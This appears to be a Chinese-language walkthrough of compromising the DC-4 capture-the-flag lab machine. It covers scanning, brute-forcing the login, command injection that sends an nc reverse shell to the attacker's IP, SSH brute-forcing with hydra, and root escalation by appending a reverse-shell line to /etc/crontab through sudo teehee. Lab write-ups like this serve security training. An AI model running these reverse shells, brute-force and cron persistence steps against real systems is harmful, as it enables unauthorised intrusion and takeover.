DC4 靶机渗透
1. 渗透过程
- 主机发现
nmap -sP 192.168.0.1/24
找到IP地址:
192.168.0.123扫描端口
root@kali:~/workspace# nmap -sS -A -p- 192.168.0.123
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-03 14:49 CST
Nmap scan report for 192.168.0.123
Host is up (0.00025s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
| 256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_ 256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open http nginx 1.15.10
|_http-server-header: nginx/1.15.10
|_http-title: System Tools
MAC Address: 00:0C:29:84:3B:AB (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
看看80端口
只有一个登录框
抓个包试试
先试试有没有sql注入
sqlmap -u http://192.168.0.123 --data "username=admin&password=1122"
并没发现sql注入
扫描下目录
dirb http://192.168.0.123
还是没啥啊~
只有爆破这条路了?
使用了BurpSuite爆破
得到账号密码:
admin : happy然后登陆
是一个执行命令的~
但是只有一些简单的命令
然后抓一个包,发现并没有对命令过滤。直接就提交了。
POST /command.php HTTP/1.1
Host: 192.168.0.123
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Origin: http://192.168.0.123
Connection: close
Referer: http://192.168.0.123/command.php
Cookie: PHPSESSID=jj07s1dhaif60k528ttntgbfb3
Upgrade-Insecure-Requests: 1
radio=ls+-l&submit=Run
我们可以修改radio的数据改成一个反弹shell的就可以
我们先监听8899端口
nc -lvp 8899然后把radio的数据改成:
nc 192.168.0.21 8899 -e /bin/bash拿到shell就看到有有三个用户
charles jim sam
而且只有jim用户目录下有些东西:
backups mbox test.sh
- 但是mbox无法查看
- `test.sh`也不知道有啥用
- 在jim/backups目录下看到一个old-password.bak,于是就拿来爆破jim的ssh密码
```bash
hydra -l jim -P old-passwords.bak ssh://192.168.0.123得到密码:
host: 192.168.0.123 login: jim password: jibril04然后就是登录jim用户了 尝试进一步提权
这时候可以查看mbox了
jim@dc-4:~$ cat mbox
From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: <root@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
(envelope-from <root@dc-4>)
id 1hCiQe-0000gc-EC
for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCiQe-0000gc-EC@dc-4>
From: root <root@dc-4>
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: RO
This is a test.
- 是邮件。一般邮件保存在
/var/mail目录里面
jim@dc-4:/var/mail$ cat jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
(envelope-from <charles@dc-4>)
id 1hCjIX-0000kO-Qt
for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O
Hi Jim,
I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.
Password is: ^xHhA&hvim0y
See ya,
Charles
发现了
charles的密码:^xHhA&hvim0y我们先登录到
charles
su charles
- 登录之后sudo -l 发现
charles@dc-4:~$ sudo -l
Matching Defaults entries for charles on dc-4:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User charles may run the following commands on dc-4:
(root) NOPASSWD: /usr/bin/teehee
- 利用
/usr/bin/teehee提权
sudo /usr/bin/teehee -a /etc/crontab */1 * * * * nc 192.168.0.21 8899 -e /bin/bash
kali 监听8899端口,等1分钟
就可以获得root的shell了
!!!THE_END!!!
2. 重要数据
# 1. 网站账号密码:
admin : happy
# 2. jim的ssh密码
jibril04
# 3. charles的ssh密码
^xHhA&hvim0y
5920
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
